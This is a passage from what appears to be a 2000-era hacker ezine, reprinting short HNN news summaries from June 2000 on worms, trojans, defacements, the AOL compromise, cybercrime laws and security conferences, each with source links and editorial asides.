      
      Fyodor's Good Reading List
      
      http://www.insecure.org/tools.html
      @HWA
      

 144.0 [HNN] June 12'00 NETSEC Discovers Nothing New 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Frank 
      Last Friday's announcement by NETSEC (Network Security Technologies)
      of a new DDOS tool installed on thousands of computers world wide
      created a lot of media attention but was really nothing new. The so
      called 'Serbian Badman Trojan' is nothing more than a repackaged
      version of Sub7, a remote administration tool similar to NetBus, that
      has been around for years. Sub7 is incapable of launching a DDoS
      attack in its current revision. NETSEC's discovery amounts to nothing
      more than a publicity stunt by an opportunistic security firm in quest
      of free advertising in the form of media attention.
      
      The UK Register
      ZD Net
      Symantec
      Network Associates
      Commandcom
      
      Late Update: 120412JUN00
      NetSec has sent us an email explaining their position.
      
      NetSec Response
      
      http://www.theregister.co.uk/content/1/11290.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2585554,00.html?chkpt
      http://www.symantec.com/avcenter/venc/data/serbian.trojan.html
      http://vil.nai.com/villib/dispvirus.asp?virus_k
      http://www.commandcom.com/virus/downtroj.html
      @HWA
      
      
 145.0 [HNN] June 12'00 Brazilian Telephone Users Privacy Breached 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by i_l00p 
      The personal data of millions of customers of the Brazilian telephone
      monopoly Telephonica, can be purchased on the street for R$10. The CD
      contains name, address, phone number (including unlisted numbers), and
      CPF number (which is similar to a social security number). Telephonica
      has admitted that they knew that the information was available since
      June of last year.
      
      Estado - Portuguese
      
      http://www.estado.com.br/editorias/2000/06/02/cid690.html
      @HWA
      
      
 146.0 [HNN] June 12'00 Dozens of Malaysian Sites Defaced 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by mortel 
      Attackers have broken into dozens of Malaysian political Websites,
      leaving government officials and opposition leaders fuming Sunday over
      images of rotting skulls and obscene messages. One vandal, calling
      himself "Xenophoria", attacked 21 pro-government Websites, posting a
      list of demands for greater press freedom and an end to corruption.
      
      Associated Press - via Yahoo
      
      http://dailynews.yahoo.com/h/ap/20000611/tc/malaysia_cyber_havoc_1.html
      @HWA
      
      
 147.0 [HNN] June 12'00 Return of FidNet 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Diane 
      The General Services Administration has released a draft request for
      proposals on the Federal Intrusion Detection Network. It is hoped that
      FidNet will enable civilian agencies to react collectively to cyber
      attacks. The draft RFP will allow vendors to determine what they can
      offer now and in the future.
      
      Federal Computer Week
      FedCIRC - RFP
      FidNet
      
      http://www.fcw.com/fcw/articles/2000/0605/web-fidnet-06-08-00.asp
      http://www.fedcirc.gov/fidnet/SECTION%20DRFP.pdf
      http://www.fedcirc.gov/fidnet/
      @HWA
      
      
 148.0 [HNN] June 12'00 H2K Update: Movie Premier, Speaker List 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      Freedom Downtime, the 2600 documentary about the Free Kevin campaign
      is nearing completion and will premiere at H2K Friday evening (July
      14). A preliminary list of speakers and panels is now available.
      Preregistration for the conference closes this coming Friday, 6/16/00.
      
      Hope 2000
      
      http://www.h2k.net/
      @HWA
      
      
 149.0 [HNN] June 12'00 Another ILOVEYOU Variant Found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Just another copycat of the ILOVEYOU worm, it's called Plan Columbia
      (aka Loveletter.AS). Most anti-virus software will detect it as part
      of the ILOVEYOU family and remove it. The subject line will read: US
      PRESIDENT AND FBI SECRETS =PLEASE VISIT = (http://WWW.SHUNSV.COM) = a
      random sequence of 6 uppercase letters.
      
      ZD Net
      
      (http://WWW.SHUNSV.COM)
      http://www.zdnet.com/zdhelp/stories/main/0,5594,2583071,00.html
      @HWA
      
      
 150.0 [HNN] June 12'00 Radio Interferer Gets Five Years 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Jack Gerritsen has pleaded guilty to charges of broadcasting over
      1,000 obscene messages on police frequencies in the Los Angeles area.
      Mr. Gerritsen has been sentenced to five years in jail for his crimes.
      (The press labeled this guy a hacker. Yeah, it takes a lot of skill
      to push a button and say obscene things.)
      
      Associated Press - via Union Tribune
      
      http://www.uniontribune.com/news/state/20000610-991447-radiohacker.html
      @HWA
      
      
 151.0 [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Apocalyse Dow 
      An Indonesian youth has been arrested while studying in Australia for
      breaking into a Singaporean company. A server at Data Storage
      Institute, a Singapore research and development center, was attacked
      in March while the student was studying in Australia. The case was
      handled by the Computer Crime Branch of the police department.
      
      Fairfax IT
      
      http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html
      @HWA
      
      
 152.0 [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by martin 
      About a year ago HNN published a story about a man who was convicted
      in England for using a cell phone on board a plane. HNN felt the law
      was less about public safety and more about airline royalties on in
      flight phone use. Finally there is some actual scientific evidence
      that illustrates the dangers of cell phone use while in flight. The
      study was conducted by Britain's Civil Aviation Authority, who
      obviously has a vested interest in the outcome of the results. While
      this is definitely a step in the right direction more studies are
      needed.
      
      HNN Archive for July 23, 1999
      New Scientist
      
      http://www.hackernews.com/arch.html?072399
      http://www.newscientist.com/nsplus/insight/phones/dangersignals.html
      @HWA
      

 153.0 [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      The US Energy Department has disclosed that two hard drives containing
      very sensitive nuclear information have come up missing from a high
      security vault at the Los Alamos National Laboratory. Officials have
      theorized that the disappearance may be related to last month's forest
      fires which caused an evacuation. Officials also commented that it was
      doubtful that espionage was involved. The two hard drives contain
      detailed information on how to disable nuclear weapons in the event of
      an emergency.
      
      C|Net
      MSNBC
      
      http://news.cnet.com/news/0-1003-200-2066575.html?tag
      http://www.msnbc.com/news/419700.asp
      @HWA
      
      
 154.0 [HNN] June 13'00 Police Stumble onto Pirates 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Seeking to recover stolen laptop computers, state troopers in
      Pennsylvania recover much more: $22 million worth of pirated Microsoft
      software and phony license agreements. Police collected more than
      8,000 copies of Windows 98, Microsoft Office and Windows NT at the
      location, and over 25,000 counterfeit end-user license agreements.
      
      Wired
      
      http://www.wired.com/news/business/0,1367,36944,00.html
      @HWA
      
      
 155.0 [HNN] June 13'00 Social Aspects of the Love Bug 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The recent ILOVEYOU virus/worm was not unique but due to its far
      reaching implications and media coverage it makes an excellent example
      to pick apart antivirus companies, the government's preventive
      measures, cyber detectives, and the guesswork involved in estimating
      billion-dollar damages.
      
      Sun World
      
      http://www.sunworld.com/sunworldonline/swol-06-2000/swol-06-lovebug.html
      @HWA
      
      
 156.0 [HNN] June 13'00 Interview with Bruce Schneier 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Rich 
      Noted cryptographer Bruce Schneier answers a few questions for
      Information Security magazine about cryptography, managed security
      services and just security in general.
      
      Information Security Magazine
      
      http://www.infosecuritymag.com/jun2000/junqa.htm
      @HWA
      
      
 157.0 [HNN] June 13'00 IC-Crypt 128 Goes Freeware 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Tom 
      Now available as freeware, IC-Crypt offers 128-bit encryption for ICQ
      users. The author has decided to make the reg code generator available
      for all.
      
      IC-Crypt
      
      http://www.ic-crypt.org.uk
      @HWA
      
      
 158.0 [HNN] June 13'00 IronBox Releases New Articles 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by White Vampire 
      Iron Box Technologies, a conglomeration of several high profile
      underground sites, has released several new articles. Sorting and
      Searching Algorithms Part 1 and 2, A Brief History Of Hacking, and A
      Different Language Across the Border which recommends using bilingual
      servers as an additional security measure.
      
      Iron Box Technologies
      
      http://www.ironboxtech.com/articles
      @HWA
      
      
 159.0 [HNN] June 13'00 Hong Kong Government Defaced, Again 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      contributed by acopalyse 
      A vandal or vandals defaced a Hong Kong government Web site Sunday,
      forcing officials to close the site down for the second time in less
      than 24 hours. The government decided to temporarily shut down the
      Interactive Government Services Directory Web site to finally solve
      the problems. The attack on Sunday followed the attack on Saturday
      which forced administrators to take the site off line for 10 hours.
      The police are investigating.
      
      Agence France-Presse - via Nando Times
      
      http://www.nandotimes.com/technology/story/body/0,1634,500214563-500303437-501680312-0,00.html
      @HWA
      


 160.0 [HNN] June 14'00 RootFest Opens Today 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      The Midwest's largest computer security convention opens today in St.
      Paul's RiverCentre. RootFest organizers estimate that as many as 1000
      people may attend RootFest this year. It is hoped that the con will be
      broadcast in both audio and video in real time over the net.
      
      RootFest
      Saint Paul Pioneer Press
      
      http://www.rootfest.org/
      http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm
      @HWA
      
      
 161.0 [HNN] June 14'00 Email Hoax Panics Credit Card Holders 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      Customers of Future Shop received an ominous message claiming that
      FutureShop customer records had been compromised and that all credit
      card numbers had been lost. Fortunately this was not true. FutureShop
      outsources its mass mailings, and someone at that unnamed company
      sent the false email. It is unknown if the perpetrator was an employee
      or someone who broke into the other company. Officials are
      investigating. (This really highlights the need of security between
      business partners. It is not enough to wall off your own little
      section of the net if you want to be secure and get work done.)
      
      NW Fusion
      
      http://www.nwfusion.com/news/2000/0612emailhoax.html?nf
      @HWA
      
      
 162.0 [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by acopalyse 
      Thousands of outside contractors, many of them foreign nationals, have
      been allowed access to the Federal Aviation Administration's critical
      computer systems without having to undergo background checks. The FAA
      is taking steps to address the gaping security hole; the agency is
      saddled with a backlog of security checks that it doesn't expect to
      complete for several months.
      
      NewsBytes
      
      http://www.newsbytes.com/pubNews/00/150560.html
      @HWA
      
 163.0 [HNN] June 14'00 @stake Announces Technical Advisory Board 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by Space Rogue
      @stake has announced the formation of their Technical Advisory Board,
      which comprises world-renowned leaders in Internet security from the
      private, public and academic spheres, including Counterpane, Intel,
      MIT and UUNet. Strengthening @Stake's already formidable Research and
      Development staff, the members of the Technical Advisory Board
      include: Edward Appel, Ernie Brickell, Dorothy Denning, Tsvi Gal,
      Scott Loftesness, Michael D. O'Dell, Jeffrey I. Schiller, and Bruce
      Schneier.
      
      Business Wire
      
      http://www.businesswire.com/webbox/bw.061300/201650341.htm
      @HWA
      
      
 164.0 [HNN] June 14'00 Site Forced to Hand Over User Identities 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Financial information Web site Interactive Investor was forced to hand
      over the names and IP addresses of contributors to its bulletin boards
      Sunday after receiving a court order obtained by Scoot.com. Scoot
      alleges the bulletin boards contained defamatory material. Civil
      liberties advocates have warned that the decision to force a Web site
      to reveal the identity of bulletin board contributors could stifle
      Internet free speech in Britain.
      
      ZD Net UK
      
      http://www.zdnet.co.uk/news/2000/23/ns-15965.html
      @HWA
      
      
 165.0 [HNN] June 14'00 ITN Email Compromised 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      Thousands of people on the ITN Desktop news email distribution list
      received an unauthorized email that said "We are one step closer to
      finding you, you little f***er." Eighteen hours later ITN sent out an
      email apologizing for the security breach.
      
      The Register UK
      
      http://www.theregister.co.uk/content/1/11324.html
      @HWA
      

 166.0 [HNN] June 15'00 Philippine President Signs Computer Crime Law 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by punkis 
      The ILOVEYOU virus/worm demonstrated the Philippines' lack of legal
      remedies for computer crimes. Now the Philippine President has signed
      into law an electronic commerce bill that will hopefully fill this
      gap. The law will punish virus spreaders with a minimum fine of $2,350
      up to a maximum commensurate with the damage caused, and they can
      receive a jail sentence of up to three years. The Philippines have now joined
      Malaysia, Singapore and South Korea as countries that have specific
      computer crime laws on the books.
      
      Associated Press - via Boston Globe
      
      http://www.boston.com/dailynews/166/economy/Philippine_president_signs_law:.shtml
      @HWA
      
      
 167.0 [HNN] June 15'00 MPAA vs 2600 Transcripts Released 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      The court has finally released the recent depositions of MPAA Chief
      Jack Valenti (taken on 6/6), the two-day deposition of MPAA
      Anti-Piracy Chief Kenneth Jacobsen (taken on 5/17 and 5/18), as well
      as the transcripts of last week's hearing on public access to these
      and other depositions (held on 6/6) and the hearing on discovery
      issues (held on 6/8). Future documents and transcripts will be posted as
      soon as they become available. Audio and Video transcripts of the
      Valenti deposition will hopefully be posted soon.
      
      2600.com
      
      http://www.2600.com/
      @HWA
      
 168.0 [HNN] June 15'00 Raytheon Unveils SilentRunner 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      Defense contractor Raytheon Co. yesterday unveiled "SilentRunner",
      what it calls the vanguard of network monitoring. At $65,000 a pop the
      software is designed to monitor internal network traffic to analyze
      communications patterns to detect when proprietary information is
      leaving the company.
      
      Associated Press - via Nando Times
      
      http://www.techserver.com/noframes/story/0,2294,500216198-500306527-501702299-0,00.html
      @HWA
      
      
 169.0 [HNN] June 15'00 30 year Old Security Report Still Useful 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by maggie d
      A report published by the Rand Corporation in 1970 for the Advanced
      Research Projects Agency was declassified in 1975. The report,
      entitled Security Controls for Computer Systems, details appropriate
      computer security safeguards that would protect classified information
      in multi-access, resource-sharing computer systems. While written in
      1970 and declassified in 1975 this document still has valuable
      comprehensive information regarding networked multi user machines.
      (Even with more and more technology the basic security principles
      still apply. People just keep making the same mistakes.)
      
      Linux Security
      
      http://www.linuxsecurity.com/resource_files/documentation/R609.1.html
      @HWA
      
      
 170.0 [HNN] June 15'00 15 yr old Receives Classified Documents 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Maggie and Apocalyse Dow 
      Claire McDonald, 15, of Devon, England, has been receiving e-mails for
      the past six months that she believed came from the Pentagon in the
      United States. Over 250 emails in all that contain classified
      information were mailed from Royal Navy Commander Jim Dale intended
      for RNC Jamie Hay. Dale, who works in the US at the Pentagon, was
      contacted by the girl when she started receiving the emails. He told
      her to contact her ISP and continued to send the classified
      information.
      
      Fairfax IT
      
      http://www.it.fairfax.com.au/breaking/20000615/A8896-2000Jun15.html
      @HWA
      
      
 171.0 [HNN] June 15'00 Underground Tools 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by rfp
      Network Computing magazine takes a stab at describing some of the more
      popular tools used by the underground.
      
      Network Computing
      
      http://www.nwc.com/1110/1110ws1.html
      @HWA
      
 
 172.0 [HNN] June 16'00 Political Candidates Deface Web Pages 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by Crystal 
      It started when Democratic candidate Maria Cantwell's campaign workers
      linked to a picture of their opponent, Sen. Slade Gorton, R-Wash., in
      a very humorous pose on their web site. The Cantwell camp evidently
      only linked to the photo on the Gorton site. Workers for Sen. Gorton
      then changed the picture to something more flattering. Now Gorton's
      campaign is accusing Cantwell, a dot-com executive, of stealing
      intellectual capital, high-tech hacking and hijacking his server.
      (Linking to a picture is now considered stealing intellectual capital?
      Yeah, I want this guy in office.)
      
      Seattle Times
      
      http://archives.seattletimes.com/cgi-bin/texis/web/vortex/display?slug
      @HWA
      
      
 173.0 [HNN] June 16'00 Mitnick Seeks to Renew Ham License 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Vapor 
      An entry in the June 7, 2000 FCC Enforcement Logs shows that Kevin
      Mitnick (N6NHG) & his legal counsel are in the process of renewing his
      General Class Ham radio license. Kevin's attorney, R. Gregory Adlin,
      argues that ham radio operation will not violate his parole
      conditions. FCC Special Counsel for Amateur Radio Enforcement Riley
      Hollingsworth states that Mitnick's current license remains valid
      while he and his lawyer gather documentation to prove that operating
      ham radios will not violate his parole.
      
      ARRL
      
      http://www.arrl.org/news/enforcement_logs/2000/0607.html
      @HWA
      
      
 174.0 [HNN] June 16'00 Value of Microsoft Trash On the Rise 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by McIntyre 
      Not really sure what to make of this story or what is exactly going on
      but it seems that someone is trying to buy the unshredded trash of the
      Association for Competitive Technology (ACT) which is closely aligned
      with Microsoft. In an unrelated incident Microsoft's Dupont offices
      were broken into earlier this week but nothing was found missing.
      
      Wired
      Wall Street Journal
      
      http://www.wired.com/news/politics/0,1283,37022,00.html
      http://interactive.wsj.com/articles/SB961105810825579561.htm
      @HWA
      
      
 175.0 [HNN] June 16'00  China Sentences Man to Death 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Fang Yong embezzled about 1.66m yuan (about 200,000 US dollars) of
      public money from the Bank of Communications of China, by
      counterfeiting bank paper, and transferring money from people's
      accounts from May to August 1990. The 36-year old "hacker" was
      sentenced to death here recently by the Ningbo Intermediate Court in
      East China's Zhejiang Province. This is the most severe punishment
      that a Chinese judicial organization has given to a "cyber criminal".
      (Hacker? Cyber Criminal? Let's try Forger and Embezzler, those words
      are much more descriptive. Oh, but they aren't as sensationalistic,
      sorry.)
      
      BBC - via Lexis-Nexis
      
      http://web.lexis-nexis.com/more/cahners-chicago/11407/5955809/4
      @HWA
      
      
 176.0 [HNN] June 16'00 OpenBSD 2.7 Now Available 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by White Vampire 
      OpenBSD 2.7 has been released. OpenBSD has gone three years without a
      remote vulnerability in the default installation and two years without
      a localhost vulnerability in the default installation. This is
      arguably the most secure operating system available. And guess what?
      It's free.
      
      Open BSD
      
      http://www.openbsd.org/27.html
      @HWA
      
      
 177.0 [HNN] June 16'00 RootFest Ends Today 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Code Kid
      The last day of RootFest, the largest security convention in the
      Midwest, ends today. Live Audio and Video is available.
      
      RootFest
      St. Paul Pioneer Press
      
      http://www.rootfest.org/
      http://www.pioneerplanet.com/yhoo/mtc_docs/027786.htm
      @HWA
      
      
 178.0 [HNN] June 16'00 White Paper: Internet Identity Theft 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      The Software and Information Industry Association, a trade group
      representing more than 1,000 high-tech companies, has released a white
      paper that details how consumers can prevent identity theft in cyber
      space. It is hoped that informing the public will help prevent cyber
      fraud, misused card numbers, and improve consumer confidence in
      shopping online.
      
      ZD Net
      Internet Identity Theft: A Tragedy For Victims
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2588919,00.html
      http://www.siia.net/sharedcontent/divisions/ebus/id_theft.pdf
      @HWA
      
      
 179.0 [HNN] June 16'00 New Ezines 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by syztrix and Cyber0ptix 
      We forgot to mention it earlier but b0g has released its fifth issue.
      Also just released is issue 4 of 0blivion Mag.
      
      B0g
      0blivion
      
      http://www.b0g.org
      http://www.0blivion.org
      @HWA
      
   
 180.0 [HNN] June 19'00 AOL Confirms Compromise 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by mortel 
      America Online confirmed Friday that some of their employee accounts
      have been compromised by attackers, and that the accounts were used to
      gain access to and view details of some personal user accounts. This
      was accomplished via a trojan that was placed on AOL employees'
      machines. (This is not the first time AOL had been compromised, it's
      just getting more press this time.)
      
      Associated Press - via Yahoo
      Reuters - via Yahoo
      ABC News
      CNN
      ZD Net
      
      Observers UK has posted a few articles that are a little bit more
      technical and offer a glimpse inside the setup of the AOL network.
      They talked with Retired who offers a step by step method of accessing
      the internal AOL network.
      
      AOL naps while hackers attack 
      CRIS access: The Mecca of ao-haxors
      
      http://dailynews.yahoo.com/h/ap/20000616/tc/aol_hacked_1.html
      http://dailynews.yahoo.com/h/nm/20000616/wr/aol_hackers_dc_1.html
      http://abcnews.go.com/sections/tech/DailyNews/aol000616.html
      http://www.cnn.com/2000/TECH/computing/06/17/aol.hacker.01/index.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2589679,00.html
      http://www.observers.net/securecris.html
      http://www.observers.net/crisreply.html
      @HWA
      
      
 181.0 [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by evenprime 
      After Microsoft and Omni Tech donated software and computers to the
      Suburban Law Enforcement Academy of the College of DuPage in
      Naperville, Illinois, the marketing machines of Omni Tech and the
      academy started making claims that "every class they've ever held,
      they actually catch someone in an act of perpetrating a crime..."
      Lewis Koch of zdnet attempted to verify these claims, but school
      officials would not give him any examples, and the DuPage County
      prosecutor's office couldn't provide any corroborating reports. School
      officials refused to explain this disparity. They also refused to
      discuss the qualifications of the staff to teach computer crime
      courses, the curriculum, or to let Koch view the course.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/comment/0,5859,2588873,00.html
      @HWA
      
      
 182.0 [HNN] June 19'00 Los Alamos Hard Drives Found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Dave 
      Two missing computer hard drives containing sensitive nuclear weapons
      data from the Los Alamos National Laboratory have been recovered,
      federal authorities announced Friday. The drives were found behind a
      copy machine that had already been searched once. Officials say they
      will continue to investigate the matter to determine if the data has
      been compromised.
      
      CNN
      Reuters - via C|Net
      
      http://www.cnn.com/2000/ALLPOLITICS/stories/06/16/losalamos.disks/index.html
      http://news.cnet.com/news/0-1003-200-2093750.html?tag
      @HWA
      
      
 183.0 [HNN] June 19'00 Japanese Exercise CyberCrime Law 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      Japanese authorities on the northern island of Hokkaido have arrested
      a man they say unlawfully penetrated through the firewall of a Web
      site, the fifth such arrest since a new cyber crime law went into
      effect earlier this year.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2589803,00.html?chkpt
      @HWA
      
      
 184.0 [HNN] June 19'00  Anti Pedophile Groups Take on the Net 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      Antichildporn.org, condemmend.org, and EHAP are all searching for
      pedophiles in an attempt to remove them and their content from the
      net. While some of the methods they use may not be ethical they say
      they are all legal. (Unfortunately there is no way to verify how
      effective these groups are.)
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/antiporn000616.html
      @HWA
      
      
 185.0 [HNN] June 19'00 More E-Zines 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by L33t Dawg 
      Issue #6 of Hack In The Box's zine is ready and available. HAO has
      released its premier E-zine, titled (EnLighten2000). The new E-zine
      has a news, windows, mac, linux, and info section. Also HWA.hax0r.news
      has released issue #53.
      
      Hack In the Box
      HAO
      HWA.hax0r.news
      
      http://www.hackinthebox.org
      http://www.hao.org
      http://welcome.to/HWA.hax0r.news/
      @HWA      
      

 186.0 [HNN] June 20'00 Stages Virus Starts to Become Widespread 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Just another copycat trojan/worm is making the rounds of corporations
      in the US, Australia, Asia, and elsewhere. Like ILOVEYOU, the latest
      virus automatically sends copies to everyone listed in the Microsoft
      Outlook program's address book. Both viruses can also spread through
      chat rooms. The new virus uses a Windows feature called Shell Scrap
      Object to activate. The virus carries an ".shs" suffix but Windows
      computers are generally configured to hide the suffix, making the file
      appear to contain only text. The virus appears to be written by Zulu,
      the same person that is believed to have written the Bubbleboy virus
      that appeared last year.
      
      Associated Press - via Canada.com
      ZD Net
      
      VBS_Stages.A - via Trend Micro
      
      http://www.canada.com/cgi-bin/cp.asp?f
      http://www.zdnet.com/zdnn/stories/news/0,4586,2590403,00.html
      http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName
      @HWA
      
      
 187.0 [HNN] June 20'00         Employees Sue Employer For Firing Over NetBus 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by RenderMan 
      About a year ago two gentlemen in New Zealand were evaluating Netbus
      Pro for tech support use, and because of this they were fired by their
      employer. They are now taking their employer to court. With recent
      changes to the treatment of Netbus, this case should be interesting in
      establishing what truly makes some code malicious. One of the
      defendants writes in his own words about the events that led up to
      this, and RenderMan looks at the issue of the power that Anti-Virus
      definitions can wield.
      
      Defendant's own words
      RenderMan's summary and background
      
      http://www.antiav.com/NZrant.html
      http://www.antiav.com/NZcase.html
      @HWA
      
      
      
 188.0 [HNN] June 20'00  The Cyberterror Scare of 2000 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      So where is the "electronic pearl harbor" that is supposed to cripple
      the US Internet Infrastructure? Last year experts were warning about
      malicious code being hidden as Y2K fixes; it is now June and nothing
      has happened. Kevin Poulsen takes a look at these and other questions
      in his latest article.
      
      Security Focus
      
      http://www.securityfocus.com/templates/article.html?id
      @HWA
      
      
 189.0 [HNN] June 20'00   AOL Increases Network Security 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by q bahl 
      AOL has revealed that intruders accessed their system by targeting
      specific employees with Trojan-laden email attachments. AOL said that
      about 200 accounts total had been compromised but that they have
      increased their security level in the wake of the intrusion. AOL has
      said that it will involve law enforcement once its internal
      investigation is completed.
      
      C|Net - via Yahoo
      
      http://dailynews.yahoo.com/h/cn/20000619/tc/aol_boosts_email_security_after_attack_1.html
      @HWA
      
      
 190.0 [HNN] June 20'00  Poll Says Americans Are Afraid of CyberCrime 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A poll released Monday at a conference of technology executives and
      law enforcement officials claims that two thirds of Americans are
      concerned about the threat of cybercriminals. The poll was commissioned
      by EDS and the Information Technology Association of America. The poll
      included the responses of 1000 people. (1,000 people speak for the
      entire country?)
      
      Associated Press
      
      http://dailynews.yahoo.com/h/ap/20000619/tc/cybercrime_2.html
      @HWA
      
      
 191.0 [HNN] June 20'00  Cyber Defense Still Looked at As Part of Cold War 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Sen. Charles Schumer (D-N.Y.) at a recent symposium blamed current
      cyber defense spending on the Cold War mentality. Other officials
      echoed these concerns saying that without an electronic Pearl Harbor
      it was difficult to convince leaders to spend the required moneys.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0619/news-dfnse-06-19-00.asp
      @HWA
      
      
 192.0 [HNN] June 20'00  FAA Opens Cyber Security Office 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Raymond Long hopes to plug the holes in the Federal Aviation
      Administration's network that may be at risk of intrusion, both in
      nationally deployed systems and systems unique to each airport. The
